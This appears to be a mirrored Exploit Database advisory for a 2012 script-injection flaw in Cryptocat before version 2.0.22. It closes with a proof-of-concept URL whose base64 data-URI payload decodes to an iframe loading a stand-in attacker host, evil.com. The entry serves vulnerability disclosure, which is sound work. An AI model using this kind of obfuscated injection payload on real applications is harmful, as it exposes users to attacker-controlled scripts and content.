Cryptocat 2.0.22 – Arbitrary Script Injection

• Exploit Database
• 25 阅读

• 作者： Mario Heiderich
  日期： 2012-11-07
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/38637/

• source: https://www.securityfocus.com/bid/61093/info
  
  Cryptocat is prone to an arbitrary script-injection vulnerability because it fails to properly sanitize user-supplied input.
  
  An attacker can exploit this issue to execute arbitrary script code within the context of the application.
  
  Versions prior to Cryptocat 2.0.22 are vulnerable. 
  
  Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg